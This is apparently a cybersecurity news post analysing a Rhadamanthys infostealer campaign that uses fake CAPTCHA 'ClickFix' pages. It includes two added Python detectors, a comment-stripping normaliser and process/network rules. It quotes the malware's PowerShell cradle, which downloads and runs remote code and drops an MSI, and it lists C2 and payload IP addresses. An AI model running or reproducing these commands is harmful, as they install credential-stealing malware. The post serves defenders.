Cyber Web Spider Blog – News
Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials

Posted on July 10, 2025 by CWS

Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating.

At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to "verify" their session by pasting a PowerShell command.

Once executed, the command silently reaches out to hxxps://ypp-studio[.]com/replace.txt, turns off execution-policy safeguards and fetches the next-stage payload in memory, remaining entirely fileless until the final drop.

Dark Atlas analysts noted that the lure pages are hosted on freshly registered typosquats, often imitating YouTube Partner Studio or similar SaaS portals, and that the underlying infrastructure has migrated from the earlier 77.239.96.51/rh_0.9.0.exe host to 62.60.226.74/PTRFHDGS.msi.

This subtle shift breaks the hard-coded IoCs used by many security tools while preserving the stealer's delivery chain.

Campaign telemetry shows a significant uptick in infections across small-to-medium enterprises during June and early July 2025, with stolen browser cookies and cloud credentials appearing on dark-web markets within hours of compromise.

What makes ClickFix especially potent is its social-engineering layer. The CAPTCHA screen offers a false sense of legitimacy while precisely guiding the victim to press Win + R, paste the command, and hit Enter.

That single action bypasses traditional e-mail gateway filters and avoids the macros most blue teams hunt for.

Verification complete (Source – Dark Atlas)

By the time a user sees the reassuring "Verification complete!" pop-up, Rhadamanthys has already unpacked in the background and begun siphoning data to its C2 at 193.109.85.136.

Infection Mechanism

The initial PowerShell command is heavily padded with hash symbols to evade string-based detectors, yet resolves into only two functional lines:

# Stage 1 - clipboard payload: fetch the next stage and run it in memory
$u='hxxps://ypp-studio[.]com/replace.txt'; (New-Object Net.WebClient).DownloadString($u) | iex
# Stage 2 - decoded from Stage 1 (the download URI is omitted in the original write-up)
Invoke-WebRequest -Uri -OutFile $env:AppData+'PTRFHDGS.msi';
Start-Process msiexec.exe -ArgumentList '/i', $env:AppData+'PTRFHDGS.msi';

Stage 1 lives only in memory; Stage 2 writes the MSI installer as PTRFHDGS.msi, which drops rh_0.9.0.exe and launches it via msiexec so that parent/child correlations appear benign.
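The hash padding described above only works against tools that match on the raw string. The following is an added example, not code from the article or from Dark Atlas: a small comment-aware normaliser that strips PowerShell `#` line comments and `<# ... #>` block comments while honouring quoted strings (so a `#` inside a string is not mistaken for padding), then matches the surviving text against a few indicator patterns. The padded sample, the trailing test line and the indicator labels are constructed for this example; the cradle itself is the one quoted in the article.

```python
import re

# Constructed sample: the two-line ClickFix cradle quoted in the article, buried
# in the kind of '#' padding the article describes (the padding itself is made
# up here, as is the trailing line whose string contains a '#').
PADDED_SAMPLE = """\
############################################
# verify session ###########################
$u='hxxps://ypp-studio[.]com/replace.txt' ########## # pad
<# block
   padding #> (New-Object Net.WebClient).DownloadString($u) | iex ####
#####################
$t="check #1 done" ###
"""


def strip_powershell_comments(script: str) -> str:
    """Drop '#' line comments and '<# ... #>' block comments, leaving quoted
    strings intact so a '#' inside a string is not mistaken for padding."""
    out = []
    i, n = 0, len(script)
    quote = None                        # delimiter of the string we are inside, or None
    while i < n:
        c = script[i]
        if quote:
            if quote == '"' and c == '`' and i + 1 < n:
                out.append(script[i:i + 2])   # backtick escape inside "..."
                i += 2
                continue
            out.append(c)
            i += 1
            if c == quote:
                if i < n and script[i] == quote:
                    out.append(script[i])     # doubled delimiter is an escaped quote
                    i += 1
                else:
                    quote = None
        elif c in ("'", '"'):
            quote = c
            out.append(c)
            i += 1
        elif script.startswith("<#", i):
            end = script.find("#>", i + 2)
            i = n if end < 0 else end + 2     # unterminated block comment eats the rest
        elif c == "#":
            nl = script.find("\n", i)
            i = n if nl < 0 else nl           # keep the newline so line structure survives
        else:
            out.append(c)
            i += 1
    return "".join(out)


def functional_lines(script: str) -> list[str]:
    """The non-blank lines that survive comment stripping, i.e. what actually runs."""
    return [ln.strip() for ln in strip_powershell_comments(script).splitlines() if ln.strip()]


# Indicator labels are my own; the patterns cover the behaviours the article names.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "execution_policy_bypass": re.compile(r"-(?:ep|ExecutionPolicy)\s+Bypass", re.I),
    "msiexec_install": re.compile(r"msiexec(?:\.exe)?\b.*?/i\b", re.I | re.S),
}


def clickfix_indicators(script: str) -> list[str]:
    """Indicator names matched against the comment-stripped script, sorted."""
    body = strip_powershell_comments(script)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(body))


if __name__ == "__main__":
    for line in functional_lines(PADDED_SAMPLE):
        print(line)
    print(clickfix_indicators(PADDED_SAMPLE))
```

Run against the sample, the normaliser reduces seven padded lines to the two functional ones plus the deliberately awkward `$t="check #1 done"`, which survives intact because the `#` sits inside a string. Matching indicators against the stripped text rather than the raw command is what keeps the padding from defeating a keyword rule.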

The executable immediately enumerates running processes, looking for debuggers such as x64dbg.exe, ida64.exe, or ProcessHacker.exe; if one is found, it terminates itself to frustrate analysis.

It follows with time-based anti-sandbox checks using QueryPerformanceCounter, then injects into WerFault.exe, a trusted Windows Error Reporting binary, to persist and exfiltrate.

A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet files and KeePass vaults.

Capturing screenshot (Source – Dark Atlas)

Screenshots captured via BitBlt are appended, giving operators a real-time window into victim activity.

Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and encrypted TLS over port 443 blends seamlessly with normal traffic.

The ClickFix campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.

Updating signature-based rules to include execution-policy bypasses, monitoring child processes of msiexec.exe, and alerting on clipboard-sourced PowerShell are immediate steps defenders should consider.

Yet the broader lesson is behavioural: any "verification" prompt that asks users to run code is suspect, especially when the only thing it fixes is the attacker's foothold.
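The detection steps listed above map onto a handful of process and network rules. What follows is an added example, not code from the article or from any vendor: four rules run over a constructed stream of Sysmon-style events that retraces the chain the article describes (Run-box PowerShell with a download cradle, msiexec installing from a user-writable path, msiexec spawning the dropped executable, and WerFault.exe talking to a public address without a DNS lookup). The `Event` schema, the file paths, the parent of msiexec and the `dns_resolved` flag (assumed to be filled in upstream by correlating DNS events) are assumptions; the C2 address and file names are the article's.

```python
import ipaddress
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal stand-in for a Sysmon/EDR record (constructed schema, not a real product's)."""
    kind: str                   # "process" (creation) or "network" (outbound connection)
    image: str                  # full path of the acting process
    parent: str = ""            # parent image, process events only
    cmdline: str = ""           # command line, process events only
    dest_ip: str = ""           # destination address, network events only
    dest_port: int = 0
    dns_resolved: bool = False  # assumed to be filled in upstream by correlating DNS events


# Patterns for the behaviours the article calls out: download cradles, in-memory
# execution and execution-policy bypass on the command line, and user-writable
# drop directories.
CRADLE = re.compile(
    r"DownloadString|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression|-(?:ep|ExecutionPolicy)\s+Bypass",
    re.I,
)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Downloads)\\", re.I)


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect(events: list[Event]) -> list[tuple[str, str]]:
    """Return (rule_name, evidence) pairs; rule names are my own labels."""
    hits = []
    for e in events:
        img, par = basename(e.image), basename(e.parent)
        if e.kind == "process":
            # Rule 1: a Run-box (Win+R) launch shows explorer.exe as the parent of
            # powershell.exe; combined with a download cradle that is the ClickFix shape.
            if img in ("powershell.exe", "pwsh.exe") and par == "explorer.exe" and CRADLE.search(e.cmdline):
                hits.append(("run_box_powershell_cradle", e.cmdline))
            # Rule 2: msiexec.exe asked to install a package from a user-writable path.
            if img == "msiexec.exe" and re.search(r"(?<![\w-])/i\b", e.cmdline) and USER_WRITABLE.search(e.cmdline):
                hits.append(("msiexec_install_from_user_path", e.cmdline))
            # Rule 3: msiexec.exe as parent of an executable living in a user-writable path
            # (the benign-looking parent/child pair the article describes).
            if par == "msiexec.exe" and img.endswith(".exe") and USER_WRITABLE.search(e.image):
                hits.append(("msiexec_spawns_user_path_exe", e.image))
        elif e.kind == "network":
            # Rule 4: WerFault.exe reaching a public address with no DNS lookup beforehand,
            # i.e. a literal-IP C2 from an injected trusted binary.
            if img == "werfault.exe" and ipaddress.ip_address(e.dest_ip).is_global and not e.dns_resolved:
                hits.append(("werfault_literal_ip_egress", f"{e.dest_ip}:{e.dest_port}"))
    return hits


# Constructed event stream: two benign records, then the chain from the article
# (paths and the parent of msiexec are assumptions; the C2 address is the article's).
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\System32\cmd.exe", cmdline="powershell Get-Process"),
    Event("network", r"C:\Windows\System32\WerFault.exe",
          dest_ip="52.0.0.1", dest_port=443, dns_resolved=True),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline="powershell -ep bypass -c \"$u='hxxps://ypp-studio[.]com/replace.txt'; "
                  "(New-Object Net.WebClient).DownloadString($u) | iex\""),
    Event("process", r"C:\Windows\System32\msiexec.exe",
          parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline=r"msiexec.exe /i C:\Users\alice\AppData\Roaming\PTRFHDGS.msi"),
    Event("process", r"C:\Users\alice\AppData\Local\Temp\rh_0.9.0.exe",
          parent=r"C:\Windows\System32\msiexec.exe", cmdline="rh_0.9.0.exe"),
    Event("network", r"C:\Windows\System32\WerFault.exe",
          dest_ip="193.109.85.136", dest_port=443, dns_resolved=False),
]

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The two benign records (a cmd.exe-launched PowerShell and a WerFault.exe connection that was preceded by a DNS lookup) produce no hits, while each stage of the chain trips exactly one rule. Rule 4 is the one that compensates for the DNS blind spot the article mentions: because the stealer connects by literal IP, the absence of a preceding lookup is itself the signal.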


Cyber Security News Tags: ClickFix, Credentials, InfoStealer, Leveraging, Login, Rhadamanthys, Steal, Technique
